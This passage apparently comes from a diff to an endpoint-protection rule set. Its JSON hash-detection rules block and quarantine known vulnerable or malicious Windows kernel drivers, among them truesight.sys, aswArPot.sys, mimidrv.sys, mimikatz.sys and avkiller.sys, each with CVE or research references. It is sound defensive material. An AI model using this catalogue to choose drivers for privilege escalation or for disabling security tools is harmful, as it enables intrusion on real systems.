"2026-03-23T11:45:29.971240Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c18ae965fba56d09a65770b4d8da54ccd7801f979d3ebd283397bc99646004b", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fcd6410-b307-5247-84e2-f03f83bbdedc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616329Z", + "creation_date": "2026-03-23T11:45:29.616331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f60536b25ba8c9014e4a57d7a9a681bd3189fa414eea88c256d029750e15cae", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fd12092-f54b-5e8f-b004-2a1104dc74cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456048Z", + "creation_date": "2026-03-23T11:45:30.456051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "52b9302507bccd7eb775137a4c17b0df9a5a99671968c01924cd0c52a0c69262", + "comment": "Vulnerable Kernel 
Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fd13f91-490b-5df3-ace8-237b11078bfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145541Z", + "creation_date": "2026-03-23T11:45:31.145543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ce6d70fd61896b1ca589c0f8512300b0be2fa4c26a4e3c5805487daed25fce1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fd1c727-6da4-5de8-9b32-be60c02ad31c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.456942Z", + "creation_date": "2026-03-23T11:45:30.456953Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456963Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c025ec72d4b8297ee2e0fac7747f39d256aad26fbf0554e3729e3e381bc6ea86", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fd82f10-a16f-59b0-8d7c-59c1705f1ce1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811274Z", + "creation_date": "2026-03-23T11:45:31.811276Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e090fc6f8c03c42d752b1cb52fa51331d0a0a245329843e3c35fac314f237bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} 
+{ + "id": "4fe88f7b-4a1c-5eaf-81cc-53cd53dccba7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152925Z", + "creation_date": "2026-03-23T11:45:31.152929Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152937Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6566352b41ad20e1d0fdb1a4c608c24cb273d8a70f568fe88b72094f4fbd8a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fe9f322-b11d-5ad8-b96d-5ddf9027552c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480697Z", + "creation_date": "2026-03-23T11:45:31.480701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0d31558649752c27457acdbfe7ece8bf4764e3f69216dfeabe47acc301b905d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ff8525c-b1b9-58e3-83ba-ee3e98972f9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142669Z", + "creation_date": "2026-03-23T11:45:32.142672Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142677Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b57caf226aaf1ee53a3e98e2f2ed40837bfa7a889b2914796f03ead147f219a6", + "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ffcf1c1-6abd-5df7-b738-8e21bb38670e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480986Z", + "creation_date": "2026-03-23T11:45:30.480989Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bef87650c29faf421e7ad666bf47d7a78a45f291b438c8d1c4b6a66e5b54c6fc", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50033f63-6cea-5367-a2be-86c52857e2bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610031Z", + "creation_date": "2026-03-23T11:45:29.610033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610038Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ee45fd2d7315fd039f3585a66e7855ba4af9d4721e1448e602623de14e932bbe", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5004279b-d577-5554-8229-cdfb98da535e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613329Z", + "creation_date": "2026-03-23T11:45:29.613331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53bb076e81f6104f41bc284eedae36bd99b53e42719573fa5960932720ebc854", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50214fe8-8e1d-5349-8037-94e464ab1c65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611745Z", + "creation_date": "2026-03-23T11:45:29.611747Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611752Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bf6f1b49ed332b31c695ee1e3e8db69d7514a3179f707034eec96de4865e1d2", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "502e41a2-19d0-5dd4-829f-0b065ee4c387", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968280Z", + "creation_date": "2026-03-23T11:45:29.968283Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968292Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "795e5774aefd74200d552bf7ede17491c254fa7a73e2a00eb0e1462f18211ff5", + "comment": "Vulnerable Kernel Driver (aka EneIo64.sys) [https://www.loldrivers.io/drivers/90ecbbf7-b02f-424d-8b7d-56cc9e3b5873/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5041a6e3-ff8b-5e20-9491-934fa55fa9f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152340Z", + "creation_date": "2026-03-23T11:45:31.152343Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152350Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a3f3f0f302e12078ec7fe953716d9ff14d60a90317ed36dc859104009b0f32e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5048346d-67e2-518c-bda3-c224ffc28682", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813006Z", + "creation_date": "2026-03-23T11:45:31.813009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d436f001638d3f7098656cdb48be86e6a9852807a5cb930b61721f6e4ca0bf5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50490c99-1eb7-5277-b77b-f0c03826efae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467413Z", + "creation_date": "2026-03-23T11:45:30.467417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36670821bb4a9d69bb6193e21b0da5c52975f001d3ed2dd7ee6307a2cff8317c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "504c36ac-ffb0-54de-9b4c-2b8dc29191bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969005Z", + "creation_date": "2026-03-23T11:45:29.969007Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94911fe6f2aba9683b10353094caf71ee4a882de63b4620797629d79f18feec5", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "505092ad-f074-51b4-83be-4840cb7be274", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822133Z", + "creation_date": "2026-03-23T11:45:31.822136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "3bbe48da0781e5052a2f1b65ae44ab7f52486db274c29311c7870d7f57ed4cc8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5068bace-3498-5fac-994e-dd0bb87cfea2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145862Z", + "creation_date": "2026-03-23T11:45:32.145864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145901Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6365024365fb0899e8a81735369a2e01f55523888e84b091858b48ef14a79e23", + "comment": "Malicious Kernel Driver (aka avkiller.sys) [https://www.loldrivers.io/drivers/7a9d34e4-c660-4388-ab61-4fd6f6bf1ad4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "506bd46c-1dfd-52ba-b356-e15bef6116cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 
1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819418Z", + "creation_date": "2026-03-23T11:45:31.819422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819430Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b43f92cbbbf47b846e10a90c594110be31ba277c02c6ea9ded0c68228ac8b7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50755618-51a9-5475-95f7-6eb61f6fa57f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485866Z", + "creation_date": "2026-03-23T11:45:31.485906Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a729cfcd1a8d9b88653abb093211d7ebf06e60b0f32ade40720c455947928c9d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "508360e1-b7cd-58a0-8d74-e72997b2db56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820591Z", + "creation_date": "2026-03-23T11:45:31.820594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "803be22d59eb2e6183cae676b7014e452d4a6bf0bacdf931b14de0239c17dcb5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5084dafd-4296-5b47-af0a-466292e622ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461935Z", + "creation_date": 
"2026-03-23T11:45:30.461938Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461954Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c13f5bc4edfbe8f1884320c5d76ca129d00de41a1e61d45195738f125dfe60a7", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "508aa9f8-60c0-5982-966e-d7484613c903", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976885Z", + "creation_date": "2026-03-23T11:45:29.976887Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b2a83d34818db56eb39a42cc9605734c9184026cca200e819b9412071206b42", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "508fb888-f341-5126-9777-3a0a79247232", + 
